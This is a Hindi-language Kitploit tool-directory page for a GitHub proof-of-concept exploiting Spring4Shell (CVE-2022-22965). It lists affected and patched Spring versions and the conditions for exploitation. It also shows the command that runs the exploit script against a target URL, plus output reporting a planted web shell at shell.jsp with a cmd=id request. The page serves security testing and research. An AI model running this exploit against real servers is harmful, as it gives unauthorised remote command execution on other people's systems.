Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22965 — Spring4Shell | Kitploit
उपकरण/GitHubGitHub/nhattanhh/cve-2022-22965
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubnhattanhh/cve-2022-22965

CVE-2022-22965

Spring4Shell

रिपॉजिटरी देखें
19 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22965 Spring4Shell-PoC

संस्करण

  • Spring Framework < 5.2.20 और 5.3.18

पैच किया गया संस्करण:

  • Spring Framework 5.3.18 और 5.2.20

  • Spring Boot 2.6.6 और 2.5.12

विवरण

  • Spring Core, Spring Framework का मुख्य घटक है। यह Spring Framework पारिस्थितिकी तंत्र में अन्य घटकों जैसे Spring MVC, Spring Boot, Spring WebFlux के निर्माण की नींव है। एक्सप्लॉइट कोड निम्नलिखित शर्तों के तहत निष्पादन योग्य है:

    • JDK 9 या उच्चतर

    • Apache Tomcat सर्वलेट कंटेनर चलाता है

    • WAR पैकेजिंग

    • पैकेज निर्भरताएँ: spring-webmvc या spring-webflux

  • यदि एप्लिकेशन को Spring Boot निष्पादन योग्य jar फ़ाइल के रूप में तैनात किया गया है, जैसा कि डिफ़ॉल्ट है, तो यह इस सुरक्षा दोष से प्रभावित नहीं होगा।

एक्सप्लॉइट:

python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting

परिणाम:

└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id
टूल डाउनलोड करें